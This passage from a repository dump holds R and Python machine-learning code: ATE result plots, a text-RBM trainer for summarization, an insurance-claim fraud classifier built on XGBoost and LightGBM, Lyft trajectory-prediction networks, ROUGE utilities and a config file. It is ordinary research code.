beta, gamma, Method) %>% \n summarise(val.avg = mean(value, na.rm = TRUE), \n val.se = sd(value, na.rm = TRUE))\n \n gp <- ggplot(ate_res_plot, \n aes_string(x = \"beta\", y = \"val.avg\", color = \"Method\")) + \n xlab(expression(beta)) + ylab(\"ATE\") + \n ggtitle(\"Average Treatment Effect Estimation\") + \n scale_x_discrete(limits = factor(1:10)) + \n geom_line(lwd = 1.5) + geom_point(pch = 19) +\n scale_color_manual(values = c(\"#000000\", \"#f76161\", \"#2990ff\", \"#712a95\",\n \"#27e838\", \"#ffc864\", \"#D55E00\", \"#CC79A7\")) + \n theme_bw() + theme(legend.position = \"bottom\", \n plot.title = element_text(hjust = 0.5, size = 25), \n legend.text = element_text(size = 15), \n axis.title = element_text(size = 20), \n axis.text = element_text(size = 20)) + \n geom_errorbar(aes(ymin = val.avg - qnorm(0.975) * val.se, \n ymax = val.avg + qnorm(0.975) * val.se), width = 0.02, \n lwd = 1.5)\n \n ggsave(filename = save_path, plot = gp, width = 30, height = 25,\n units = \"cm\")\n}\n\n\nate_res <- read.csv(\"../results/ate_results.csv\")\nate_res <- ate_res[, 2:ncol(ate_res)]\ngen.plot(ate_res, \"../results/ate_results.pdf\")\n\nate_res <- read.csv(\"../results/ate_results2.csv\")\nate_res <- ate_res[, 2:ncol(ate_res)]\ngen.plot(ate_res, \"../results/ate_results2.pdf\")\n\n\n\n\n" }, { "alpha_fraction": 0.6261386275291443, "alphanum_fraction": 0.6423762440681458, "avg_line_length": 29.409639358520508, "blob_id": "428ca5e697a4b914d90ba9f5327bcf757938298f", "content_id": "caf742009f057fe6c500aa78193b0e69529eb096", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2525, "license_type": "permissive", "max_line_length": 106, "num_lines": 83, "path": "/rbm_summarizer/train_textRBM/run_textRBM.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function, division\n# load modules in other files\nimport sys\nimport os\nimport time\n\n# module_path = os.path.abspath(os.path.join('..'))\n# if module_path not in sys.path:\n# sys.path.append(module_path)\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.nn.utils import clip_grad_norm_\n\n# # autoreload self-defined modules\n# %load_ext autoreload\n# %autoreload 2\n\nfrom data_util import utils\nfrom data_util import config\nfrom data_util.batcher import Batcher\nfrom data_util.data import Vocab\nfrom data_util.utils import calc_running_avg_loss\nfrom training_ptr_gen.train_util import get_rbm_input_from_batch\n\nfrom textRBM import TextRBM\nfrom training_ptr_gen.train import Train\n\n\ndef save(save_dir, iter, model):\n ckpt_dict = {'model_state': model.state_dict(), 'iter': iter}\n ckpt_path = os.path.join(save_dir, \"iter_%d.pth.tar\" % iter)\n torch.save(ckpt_dict, ckpt_path)\n\nif __name__ == '__main__':\n\n vocab = Vocab(config.vocab_path, config.vocab_size)\n batcher = Batcher(config.train_data_path, vocab, mode='train',\n batch_size=128, single_pass=False)\n time.sleep(15)\n\n import time\n start_time = time.time()\n save_dir = \"/home/yang6367/gitrepos/pointer_summarizer/train_textRBM/save/rbm%d\" % int(start_time)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n use_cuda = True\n device = utils.get_devices([5])\n rbm = TextRBM(k=1, device=device).to(device)\n train_op = optim.Adagrad(rbm.parameters(), lr=0.15, initial_accumulator_value=config.adagrad_init_acc)\n\n iter = 0\n niters = 5000\n loss_ = []\n while iter < niters:\n batch = batcher.next_batch()\n docs_word_count = get_rbm_input_from_batch(batch, vocab, use_cuda, device)\n\n v,v1 = rbm(docs_word_count.float())\n loss = rbm.free_energy(v) - rbm.free_energy(v1)\n loss_.append(loss.data)\n train_op.zero_grad()\n loss.backward()\n clip_grad_norm_(rbm.parameters(), config.max_grad_norm)\n train_op.step()\n\n iter += 1\n\n # update k\n if iter % 1000 == 0:\n rbm.k = int(iter / 1000) + 1\n if iter % 50 == 0:\n print(\"Training loss for %d iter: %.5f\" % (iter, np.mean(loss_)))\n loss_ = []\n if iter % 200 == 0:\n save(save_dir, iter, rbm)\n\n print(\"%f seconds\" % (time.time() - start_time))\n\n" }, { "alpha_fraction": 0.6301233768463135, "alphanum_fraction": 0.6427092552185059, "avg_line_length": 43.899627685546875, "blob_id": "7267219f3bcc9f9704ebde4cb658d770bd27ed6e", "content_id": "0548bab740c61ac843afb020a14f3794333c2a65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12077, "license_type": "no_license", "max_line_length": 112, "num_lines": 269, "path": "/Kaggle_Travelers/notebooks/Classification.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "##### Import packages #####\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import StratifiedKFold\nfrom sklearn import model_selection\nfrom skopt import BayesSearchCV\nfrom matplotlib import pyplot\nfrom xgboost import plot_importance\nimport warnings\nwarnings.filterwarnings('ignore')\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve, auc\n\n\nfrom xgboost import XGBClassifier\nfrom sklearn import model_selection\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import (RandomForestClassifier, AdaBoostClassifier, \n GradientBoostingClassifier, VotingClassifier)\nfrom mlxtend.classifier import StackingCVClassifier\nfrom lightgbm import LGBMClassifier\nimport lightgbm as lgb\n\nfrom random import sample\nimport random\nfrom statistics import mean\n\n\n##### Transform dataset for XGBoost and LightGBM #####\n\n### XGBoost\n# Import Data \ntrain = pd.read_csv(\"../data/train_data_clean_4_grouped.csv\")\ntest = pd.read_csv(\"../data/test_data_clean_4_grouped.csv\")\n\n# Encode gender and living status and state \ntrain[\"living_status\"] = pd.Categorical(train[\"living_status\"])\ntrain[\"gender\"] = np.where(train[\"gender\"].str.contains(\"M\"), 1, 0)\ntrain[\"living_status\"] = np.where(train[\"living_status\"].str.contains(\"Rent\"), 1, 0)\n\ntest[\"living_status\"] = pd.Categorical(test[\"living_status\"])\ntest[\"gender\"] = np.where(test[\"gender\"].str.contains(\"M\"), 1, 0)\ntest[\"living_status\"] = np.where(test[\"living_status\"].str.contains(\"Rent\"), 1, 0)\n\n# one-hot encoding for site of state\nstate_dummies = pd.get_dummies(test['state'], \n prefix='state', drop_first=True)\ntest = pd.concat([test, state_dummies], axis=1)\ntest.drop([\"state\"], axis=1, inplace=True)\n\n# one-hot encoding for site of state\nstate_dummies = pd.get_dummies(train['state'], \n prefix='state', drop_first=True)\ntrain = pd.concat([train, state_dummies], axis=1)\ntrain.drop([\"state\"], axis=1, inplace=True)\n\n\n# Drop month, day and year data, drop vehicle color, zipcode, claim_date, claim_number and SP_Index #####\ntrain.drop([\"claim_month_january\", \"claim_month_february\", \"claim_month_march\", \"claim_month_may\", \n \"claim_month_june\", \"claim_month_july\", \"claim_month_august\", \"claim_month_september\", \n \"claim_month_october\", \"claim_month_november\", \"claim_month_december\", \n \"claim_day_monday\", \"claim_day_tuesday\", \"claim_day_wednesday\", \"claim_day_thursday\", \n \"claim_day_saturday\", \"claim_day_sunday\", \"claim_year\", \"claim_day\", \n \"zip_code\", \"claim_date\", \"claim_number\", 'SP_Index', \"vehicle_color_blue\", \n \"vehicle_color_gray\", \"vehicle_color_other\", \"vehicle_color_red\", \n \"vehicle_color_silver\", \"vehicle_color_white\"], axis =1, inplace=True)\n\ntest.drop([\"claim_month_january\", \"claim_month_february\", \"claim_month_march\", \"claim_month_may\", \n \"claim_month_june\", \"claim_month_july\", \"claim_month_august\", \"claim_month_september\", \n \"claim_month_october\", \"claim_month_november\", \"claim_month_december\", \n \"claim_day_monday\", \"claim_day_tuesday\", \"claim_day_wednesday\", \"claim_day_thursday\", \n \"claim_day_saturday\", \"claim_day_sunday\", \"claim_year\", \"claim_day\", \n \"zip_code\", \"claim_date\", \"claim_number\", 'SP_Index', \"vehicle_color_blue\", \n \"vehicle_color_gray\", \"vehicle_color_other\", \"vehicle_color_red\", \n \"vehicle_color_silver\", \"vehicle_color_white\"], axis =1, inplace=True)\n\n\n# Add saftyrating/(number of past claim) feature \ntrain['per_saftyrating'] = train['safty_rating']/(train['past_num_of_claims']+1)\ntest['per_saftyrating'] = test['safty_rating']/(test['past_num_of_claims']+1)\n\n\n# Delete some fraud_mean variables \ntrain.drop([\"fraud_gender\", \"fraud_marital_status\", \"fraud_high_education_ind\", \"fraud_address_change_ind\", \n \"fraud_living_status\", \"fraud_zip_code\", \"fraud_claim_date\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_accident_site\", \"fraud_channel\", \"fraud_vehicle_category\",\n \"fraud_vehicle_color\", \"fraud_state\",\"Unem_rate\"],\n axis = 1, inplace = True)\ntest.drop([\"fraud_gender\", \"fraud_marital_status\", \"fraud_high_education_ind\", \"fraud_address_change_ind\", \n \"fraud_living_status\", \"fraud_zip_code\", \"fraud_claim_date\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_accident_site\", \"fraud_channel\", \"fraud_vehicle_category\",\n \"fraud_vehicle_color\", \"fraud_state\", \"Unem_rate\"],\n axis = 1, inplace = True)\ntrain = train.filter(regex=\"^(?!state_).*$\")\ntest = test.filter(regex=\"^(?!state_).*$\")\n\ntrain_xgb = train.copy()\ntest_xgb = test.copy()\n\n\n### LightGBM\n# read full training data set\ndf_train = pd.read_csv('../data/train_data_clean_5_grouped.csv')\ngender_dummies = pd.get_dummies(df_train['gender'], \n prefix = 'gender', drop_first = True)\ndf_train = pd.concat([df_train, gender_dummies], axis = 1)\ndf_train.drop([\"gender\"], axis = 1, inplace = True)\n\nliving_status_dummies = pd.get_dummies(df_train['living_status'], \n prefix = 'living_status', drop_first = True)\ndf_train = pd.concat([df_train, living_status_dummies], axis = 1)\ndf_train.drop([\"living_status\"], axis = 1, inplace = True)\n\nstate_dummies = pd.get_dummies(df_train['state'], \n prefix = 'state', drop_first = True)\ndf_train = pd.concat([df_train, state_dummies], axis = 1)\ndf_train.drop([\"state\"], axis = 1, inplace = True)\n\ndf_train = df_train.sample(frac=1, random_state=5)\ndf_train['new_param'] = df_train.apply(lambda col: col['safty_rating']/(col['past_num_of_claims']+1), axis=1)\n\ndf_train.set_index('claim_number', inplace=True)\ndf_train.sort_index(inplace=True)\ndf_train.drop(['claim_date','fraud_claim_date','fraud_zip_code',\n \"fraud_gender\", \"fraud_marital_status\", 'fraud_accident_site', 'fraud_high_education_ind',\n \"fraud_address_change_ind\", \"fraud_living_status\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_channel\", \"fraud_vehicle_category\",\n 'fraud_vehicle_color', 'fraud_state', 'SP_Index', 'Unem_rate'], axis = 1, inplace = True)\ndf_train = df_train.filter(regex=\"^(?!state_).*$\")\ndf_train = df_train.filter(regex=\"^(?!vehicle_color_).*$\")\ndf_train = df_train.filter(regex=\"^(?!claim_day_).*$\")\ndf_train = df_train.filter(regex=\"^(?!claim_month_).*$\")\n\ntrain_lgb = df_train.copy()\n\n# read full testing data set\ndf_test = pd.read_csv('../data/test_data_clean_5_grouped.csv')\ngender_dummies = pd.get_dummies(df_test['gender'], \n prefix = 'gender', drop_first = True)\ndf_test = pd.concat([df_test, gender_dummies], axis = 1)\ndf_test.drop([\"gender\"], axis = 1, inplace = True)\n\nliving_status_dummies = pd.get_dummies(df_test['living_status'], \n prefix = 'living_status', drop_first = True)\ndf_test = pd.concat([df_test, living_status_dummies], axis = 1)\ndf_test.drop([\"living_status\"], axis = 1, inplace = True)\n\nstate_dummies = pd.get_dummies(df_test['state'], \n prefix = 'state', drop_first = True)\ndf_test = pd.concat([df_test, state_dummies], axis = 1)\ndf_test.drop([\"state\"], axis = 1, inplace = True)\n\ndf_test['new_param'] = df_test.apply(lambda col: col['safty_rating']/(col['past_num_of_claims']+1), axis=1)\n\ndf_test.set_index('claim_number', inplace=True)\ndf_test.sort_index(inplace=True)\ndf_test.drop(['claim_date','fraud_claim_date','fraud_zip_code',\n \"fraud_gender\", \"fraud_marital_status\", 'fraud_accident_site', 'fraud_high_education_ind',\n \"fraud_address_change_ind\", \"fraud_living_status\", \"fraud_witness_present_ind\", \n \"fraud_policy_report_filed_ind\", \"fraud_channel\", \"fraud_vehicle_category\",\n 'fraud_vehicle_color', 'fraud_state', 'SP_Index', 'Unem_rate'], axis = 1, inplace = True)\ndf_test = df_test.filter(regex=\"^(?!state_).*$\")\ndf_test = df_test.filter(regex=\"^(?!vehicle_color_).*$\")\ndf_test = df_test.filter(regex=\"^(?!claim_day_).*$\")\ndf_test = df_test.filter(regex=\"^(?!claim_month_).*$\")\n\ntest_lgb = df_test.copy()\n\n\n##### Use CV to get the result #####\n# Set the cost for misclassification\ncost_dict = {0: 0, 1: 1, -1: 5}\n\n# Set the seed list for splitting dataset\nseed_list = [100, 150, 200, 250, 300, 350]\n\n# Set the parameters of XGBoost and LightGBM\nclf = xgb.XGBClassifier(max_depth=3,\n learning_rate=0.06,\n n_estimators=180,\n silent=True,\n objective='binary:logistic',\n gamma=0.35,\n min_child_weight=5,\n max_delta_step=0,\n subsample=0.8,\n colsample_bytree=0.785,\n colsample_bylevel=1,\n reg_alpha=0.01,\n reg_lambda=1,\n scale_pos_weight=1,\n seed=1440,\n missing=None)\n\nlgbm_params = {'boosting_type':'gbdt', 'objective':'binary', 'num_boost_round':800,\n 'feature_fraction': .321, 'bagging_fraction':0.50, 'min_child_samples':100, \n 'min_child_weigh':35, 'max_depth':3, 'num_leaves':2, 'learing_rate':0.15,\n 'reg_alpha':5, 'reg_lambda': 1.1, 'metric':'auc', 'max_bin': 52,\n 'colsample_bytree': 0.9, 'subsample': 0.8, 'is_unbalance': 'true'\n}\n\ncost_list = []\nthre_list = [0.364] # to try diffrent range, just modify this code\nfor threshold in thre_list:\n cost = []\n for seed in seed_list:\n # generate row indexes\n random.seed(seed)\n rindex = np.array(sample(range(len(train_xgb)), round(0.7 * len(train_xgb))))\n\n # Split train dataset into training and validation parts\n # train_xgb and test_xgb are for XGBoost, train_lgb and test_lgb are for LightGBM\n\n training_xgb = train_xgb.iloc[rindex, :]\n validation_xgb = train_xgb.drop(train_xgb.index[rindex])\n\n training_lgb = train_lgb.iloc[rindex, :]\n validation_lgb = train_lgb.drop(train_lgb.index[rindex])\n\n # XGBoost\n y_training_xgb = training_xgb[\"fraud\"]\n X_training_xgb = training_xgb.drop(\"fraud\", 1)\n y_validation_xgb = validation_xgb[\"fraud\"]\n X_validation_xgb = validation_xgb.drop(\"fraud\", 1)\n\n clf.fit(X_training_xgb, y_training_xgb)\n y_validation_prob_xgb = clf.predict_proba(X_validation_xgb)[:,1]\n\n # LightGBM\n y_training_lgb = training_lgb[\"fraud\"]\n X_training_lgb = training_lgb.drop(\"fraud\", 1)\n y_validation_lgb = validation_lgb[\"fraud\"]\n X_validation_lgb = validation_lgb.drop(\"fraud\", 1)\n\n\n lgbm = LGBMClassifier(**lgbm_params)\n lgbm.fit(X_training_lgb.values, y_training_lgb.values)\n y_validation_prob_lgb = lgbm.predict_proba(X_validation_lgb.values)[:,1]\n\n # Combine the result of two models\n validation_prob = 0.4 * y_validation_prob_xgb + 0.6 * y_validation_prob_lgb\n\n # Calculate the cost\n validation_pred = (validation_prob > threshold)*1 # a trick to transform boolean into int type\n cost.append(sum([cost_dict[i] for i in (validation_pred - y_validation_xgb)]))\n \n cost_list.append(mean(cost))\n\nmin_index = cost_list.index(min(cost_list))\nprint(thre_list[min_index])\nprint(cost_list[min_index])\n\n\n##### Fraud Classification #####\n# Predict on the test dataset\ncost_dict = {0: 0, 1: 1, -1: 5}\ntest_pred = pd.read_csv('../data/predictions/combined_predictions.csv')\ntest_pred['fraud'] = (test_pred['fraud'] > 0.364)*1\ntest_pred = test_pred.set_index('claim_number')\ntest_pred.to_csv('../data/predictions/fraud_classification.csv')\n\n# Estimate the cost on the test dataset\ncost_list[min_index] * len(test_xgb) / (0.3 * len(train_xgb))" }, { "alpha_fraction": 0.6105572581291199, "alphanum_fraction": 0.6236312985420227, "avg_line_length": 40.632652282714844, "blob_id": "aea0a66a80d5ff30d0fee011f4bedaa16285869f", "content_id": "e500c55ebe8349c611527be256d89850cf34bae6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6119, "license_type": "no_license", "max_line_length": 105, "num_lines": 147, "path": "/lyft/models.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import torch\nfrom torch import nn\nfrom torchvision.models.resnet import resnet50, resnet18, resnet34, resnet101\nfrom efficientnet_pytorch import EfficientNet\nfrom typing import Dict\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\nclass LyftEffnet(nn.Module):\n\n def __init__(self, cfg: Dict, num_modes=3):\n super().__init__()\n\n # architecture = cfg[\"model_params\"][\"model_architecture\"]\n # backbone = eval(architecture)(pretrained=True, progress=True)\n backbone = EfficientNet.from_pretrained(\"efficientnet-b4\")\n self.backbone = backbone\n\n num_history_channels = (cfg[\"model_params\"][\"history_num_frames\"] + 1) * 2\n num_in_channels = 3 + num_history_channels\n\n # X, Y coords for the future positions (output shape: batch_sizex50x2)\n self.future_len = cfg[\"model_params\"][\"future_num_frames\"]\n num_targets = 2 * self.future_len\n self.num_preds = num_targets * num_modes\n self.num_modes = num_modes\n\n # modify the input channels and output channels of efficientnet\n self.backbone._conv_stem.in_channels = num_in_channels\n conv_weight = self.backbone._conv_stem.weight\n self.backbone._conv_stem.weight = nn.Parameter(conv_weight.repeat(1, 9, 1, 1)[:, 0:25, :, :])\n # rewrite the fc layer, don't use the backbone _fc, it doesn't work\n in_features = self.backbone._fc.in_features \n self._fc = nn.Linear(in_features = in_features, \\\n out_features = self.num_preds + num_modes, bias = True)\n\n def forward(self, x):\n # convolution layers\n x = self.backbone.extract_features(x)\n \n # pooling and final linear layer\n x = self.backbone._avg_pooling(x)\n x = x.flatten(start_dim = 1)\n x = self.backbone._dropout(x)\n x = self._fc(x)\n\n # pred (batch_size)x(modes)x(time)x(2D coords)\n # confidences (batch_size)x(modes)\n bs, _ = x.shape\n pred, confidences = torch.split(x, self.num_preds, dim=1)\n pred = pred.view(bs, self.num_modes, self.future_len, 2)\n assert confidences.shape == (bs, self.num_modes)\n confidences = torch.softmax(confidences, dim=1)\n return pred, confidences\n\n\nclass LyftDensenet(nn.Module):\n\n def __init__(self, cfg: Dict, num_modes=3):\n super().__init__()\n\n # architecture = cfg[\"model_params\"][\"model_architecture\"]\n # backbone = eval(architecture)(pretrained=True, progress=True)\n backbone = torch.hub.load(\"pytorch/vision:v0.6.0\", \"densenet161\", \n pretrained = True)\n self.backbone = backbone\n\n num_history_channels = (cfg[\"model_params\"][\"history_num_frames\"] + 1) * 2\n num_in_channels = 3 + num_history_channels\n\n # X, Y coords for the future positions (output shape: batch_sizex50x2)\n self.future_len = cfg[\"model_params\"][\"future_num_frames\"]\n num_targets = 2 * self.future_len\n self.num_preds = num_targets * num_modes\n self.num_modes = num_modes\n\n # modify the input channels and output channels of efficientnet\n self.backbone.features.conv0.in_channels = num_in_channels\n conv_weight = self.backbone.features.conv0.weight\n self.backbone.features.conv0.weight = nn.Parameter(conv_weight.repeat(1, 9, 1, 1)[:, 0:25, :, :])\n # rewrite the fc layer, don't use the backbone _fc, it doesn't work\n in_features = self.backbone.classifier.in_features \n self.backbone.classifier = nn.Linear(in_features = in_features, \\\n out_features = self.num_preds + num_modes, bias = True)\n \n\n def forward(self, x):\n # convolution layers\n x = self.backbone(x)\n\n # pred (batch_size)x(modes)x(time)x(2D coords)\n # confidences (batch_size)x(modes)\n bs, _ = x.shape\n pred, confidences = torch.split(x, self.num_preds, dim=1)\n pred = pred.view(bs, self.num_modes, self.future_len, 2)\n assert confidences.shape == (bs, self.num_modes)\n confidences = torch.softmax(confidences, dim=1)\n return pred, confidences\n\n\nclass LyftEffnetb7(nn.Module):\n\n def __init__(self, cfg: Dict, num_modes=3):\n super().__init__()\n\n # architecture = cfg[\"model_params\"][\"model_architecture\"]\n # backbone = eval(architecture)(pretrained=True, progress=True)\n backbone = EfficientNet.from_pretrained(\"efficientnet-b7\")\n self.backbone = backbone\n\n num_history_channels = (cfg[\"model_params\"][\"history_num_frames\"] + 1) * 2\n num_in_channels = 3 + num_history_channels\n\n # X, Y coords for the future positions (output shape: batch_sizex50x2)\n self.future_len = cfg[\"model_params\"][\"future_num_frames\"]\n num_targets = 2 * self.future_len\n self.num_preds = num_targets * num_modes\n self.num_modes = num_modes\n\n # modify the input channels and output channels of efficientnet\n self.backbone._conv_stem.in_channels = num_in_channels\n conv_weight = self.backbone._conv_stem.weight\n self.backbone._conv_stem.weight = nn.Parameter(conv_weight.repeat(1, 9, 1, 1)[:, 0:25, :, :])\n # rewrite the fc layer, don't use the backbone _fc, it doesn't work\n in_features = self.backbone._fc.in_features \n self._fc = nn.Linear(in_features = in_features, \\\n out_features = self.num_preds + num_modes, bias = True)\n\n def forward(self, x):\n # convolution layers\n x = self.backbone.extract_features(x)\n \n # pooling and final linear layer\n x = self.backbone._avg_pooling(x)\n x = x.flatten(start_dim = 1)\n x = self.backbone._dropout(x)\n x = self._fc(x)\n\n # pred (batch_size)x(modes)x(time)x(2D coords)\n # confidences (batch_size)x(modes)\n bs, _ = x.shape\n pred, confidences = torch.split(x, self.num_preds, dim=1)\n pred = pred.view(bs, self.num_modes, self.future_len, 2)\n assert confidences.shape == (bs, self.num_modes)\n confidences = torch.softmax(confidences, dim=1)\n return pred, confidences" }, { "alpha_fraction": 0.6302567720413208, "alphanum_fraction": 0.6401190757751465, "avg_line_length": 32.59375, "blob_id": "0f850798c5e1fc9c33ced75861ec4d1de24fef22", "content_id": "d3aa1d09a940f36a567630793049cbe4cb93be4e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5374, "license_type": "permissive", "max_line_length": 96, "num_lines": 160, "path": "/rbm_summarizer/data_util/utils.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "#Content of this file is copied from https://github.com/abisee/pointer-generator/blob/master/\nimport os\nimport pyrouge\nimport logging\nimport tensorflow as tf\nimport torch\n\ndef print_results(article, abstract, decoded_output):\n print (\"\")\n print('ARTICLE: %s', article)\n print('REFERENCE SUMMARY: %s', abstract)\n print('GENERATED SUMMARY: %s', decoded_output)\n print( \"\")\n\n\ndef make_html_safe(s):\n s.replace(\"<\", \"&lt;\")\n s.replace(\">\", \"&gt;\")\n return s\n\n\ndef rouge_eval(ref_dir, dec_dir):\n r = pyrouge.Rouge155()\n r.model_filename_pattern = '#ID#_reference.txt'\n r.system_filename_pattern = '(\\d+)_decoded.txt'\n r.model_dir = ref_dir\n r.system_dir = dec_dir\n logging.getLogger('global').setLevel(logging.WARNING) # silence pyrouge logging\n rouge_results = r.convert_and_evaluate()\n return r.output_to_dict(rouge_results)\n\n\ndef rouge_log(results_dict, dir_to_write):\n log_str = \"\"\n for x in [\"1\",\"2\",\"l\"]:\n log_str += \"\\nROUGE-%s:\\n\" % x\n for y in [\"f_score\", \"recall\", \"precision\"]:\n key = \"rouge_%s_%s\" % (x,y)\n key_cb = key + \"_cb\"\n key_ce = key + \"_ce\"\n val = results_dict[key]\n val_cb = results_dict[key_cb]\n val_ce = results_dict[key_ce]\n log_str += \"%s: %.4f with confidence interval (%.4f, %.4f)\\n\" % (key, val, val_cb, val_ce)\n print(log_str)\n results_file = os.path.join(dir_to_write, \"ROUGE_results.txt\")\n print(\"Writing final ROUGE results to %s...\"%(results_file))\n with open(results_file, \"w\") as f:\n f.write(log_str)\n\n\ndef calc_running_avg_loss(loss, running_avg_loss, summary_writer, step, decay=0.99):\n if running_avg_loss == 0: # on the first iteration just take the loss\n running_avg_loss = loss\n else:\n running_avg_loss = running_avg_loss * decay + (1 - decay) * loss\n running_avg_loss = min(running_avg_loss, 12) # clip\n loss_sum = tf.Summary()\n tag_name = 'running_avg_loss/decay=%f' % (decay)\n loss_sum.value.add(tag=tag_name, simple_value=running_avg_loss)\n summary_writer.add_summary(loss_sum, step)\n return running_avg_loss\n\n\ndef write_for_rouge(reference_sents, decoded_words, ex_index,\n _rouge_ref_dir, _rouge_dec_dir):\n decoded_sents = []\n while len(decoded_words) > 0:\n try:\n fst_period_idx = decoded_words.index(\".\")\n except ValueError:\n fst_period_idx = len(decoded_words)\n sent = decoded_words[:fst_period_idx + 1]\n decoded_words = decoded_words[fst_period_idx + 1:]\n decoded_sents.append(' '.join(sent))\n\n # pyrouge calls a perl script that puts the data into HTML files.\n # Therefore we need to make our output HTML safe.\n decoded_sents = [make_html_safe(w) for w in decoded_sents]\n reference_sents = [make_html_safe(w) for w in reference_sents]\n\n ref_file = os.path.join(_rouge_ref_dir, \"%06d_reference.txt\" % ex_index)\n decoded_file = os.path.join(_rouge_dec_dir, \"%06d_decoded.txt\" % ex_index)\n\n with open(ref_file, \"w\") as f:\n for idx, sent in enumerate(reference_sents):\n f.write(sent) if idx == len(reference_sents) - 1 else f.write(sent + \"\\n\")\n with open(decoded_file, \"w\") as f:\n for idx, sent in enumerate(decoded_sents):\n f.write(sent) if idx == len(decoded_sents) - 1 else f.write(sent + \"\\n\")\n\n #print(\"Wrote example %i to file\" % ex_index)\n\n\ndef get_devices(gpu_ids=[0]):\n if torch.cuda.is_available():\n device = torch.device(\"cuda:%d\" % (gpu_ids[0]))\n # torch.cuda.set_device(device)\n else:\n device = torch.device(\"cpu\")\n return device\n\n\n##============ Word Preprocessing ==========##\n\n# load the stopwords provided by Stanford CoreNLP\nf = open(\"/home/yang6367/gitrepos/cnn-dailymail/corenlp-stopwords.txt\")\nstopwords = f.read().split('\\n')\n\n# def remove_stopwords(words):\n# return [w for w in words if w not in stopwords]\n\ndef clean(words):\n # drop the words that are meaningless\n dropwords = stopwords + ['[UNK]', '[PAD]', '[START]', '[STOP]', '--', 'cnn', \\\n '!!!', '!!!!', \"'''\", \"**\", \"***\", \"****\", \"*****\", \"******\", \\\n \"*******\", \"--\", \"-rcb-\", \"/\"]\n return [w for w in words if w not in dropwords]\n\n\nimport nltk\nfrom nltk.stem import WordNetLemmatizer\nwordnet_lemmatizer = WordNetLemmatizer()\ndef lem(w):\n word1 = wordnet_lemmatizer.lemmatize(w, pos = \"n\")\n word2 = wordnet_lemmatizer.lemmatize(word1, pos = \"v\")\n word3 = wordnet_lemmatizer.lemmatize(word2, pos = (\"a\"))\n return word3\n# def lemmatize(words):\n# return [lem(w) for w in words]\ndef lemmatize(words):\n words_ = []\n for w in words:\n # use try/except to handle the ascii string in the words\n try:\n words_.append(lem(w))\n except:\n pass\n return words_\n\n\n# read the top 15k words into a list\nwith open(\"/home/yang6367/gitrepos/cnn-dailymail/top15k_words.txt\", \"r\") as f:\n top15k_words = [word.rstrip() for word in f.readlines()]\n\ndef keep_top15k(words):\n return [w for w in words if w in top15k_words]\n\nfrom collections import Counter, OrderedDict\nimport numpy as np\n# transform a word list into a word-count tensor\ndef get_word_count(words):\n # initialize the orderedDict\n ordered_dict = OrderedDict((w, 0) for w in top15k_words)\n # update the orderedDict\n for word, count in dict(Counter(words)).items():\n ordered_dict[word] = count\n # extract the word count as a list\n return ordered_dict.values()\n # return Variable(torch.Tensor(ordered_dict.values()).int())" }, { "alpha_fraction": 0.6781695485115051, "alphanum_fraction": 0.7479369640350342, "avg_line_length": 26.79166603088379, "blob_id": "ba144a8d4887bb246ef0cde6ad19f93f1b9ff6a2", "content_id": "fb77e66a4ebb890e8c1e523294e6a81143b4b1ec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1333, "license_type": "permissive", "max_line_length": 143, "num_lines": 48, "path": "/rbm_summarizer/data_util/config.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import os\n\nroot_dir = os.path.expanduser(\"~\")\n\n#train_data_path = os.path.join(root_dir, \"ptr_nw/cnn-dailymail-master/finished_files/train.bin\")\ntrain_data_path = os.path.join(root_dir, \"gitrepos/cnn-dailymail/finished_files/chunked/train_*\")\neval_data_path = os.path.join(root_dir, \"gitrepos/cnn-dailymail/finished_files/val.bin\")\ndecode_data_path = os.path.join(root_dir, \"gitrepos/cnn-dailymail/finished_files/test.bin\")\nvocab_path = os.path.join(root_dir, \"gitrepos/cnn-dailymail/finished_files/vocab\")\nlog_root = os.path.join(root_dir, \"gitrepos/pointer_summarizer/log\")\n\n# Hyperparameters\nhidden_dim= 256\nemb_dim= 128\nbatch_size= 8\nmax_enc_steps=400\nmax_dec_steps=100\nbeam_size=4\nmin_dec_steps=35\nvocab_size=50000\n\nlr=0.15\nadagrad_init_acc=0.1\nrand_unif_init_mag=0.02\ntrunc_norm_init_std=1e-4\nmax_grad_norm=2.0\n\npointer_gen = True\nis_coverage = False\ncov_loss_wt = 1.0\n\neps = 1e-12\nmax_iterations = 500000\n\nuse_gpu=True\n\nlr_coverage=0.15\n\n\ngpu_ids = [7]\nbatch_size *= max(1, len(gpu_ids))\n\n\n# config for rbm\nadd_rbm = True\nlatent_dim = 200\n# rbm_ckpt_path = \"/home/yang6367/gitrepos/pointer_summarizer/train_textRBM/save/rbm1618806575/iter_28000.pth.tar\" # trained using batch size 8\nrbm_ckpt_path = \"/home/yang6367/gitrepos/pointer_summarizer/train_textRBM/save/rbm1618843026/iter_2000.pth.tar\" # trained using batch size 128" }, { 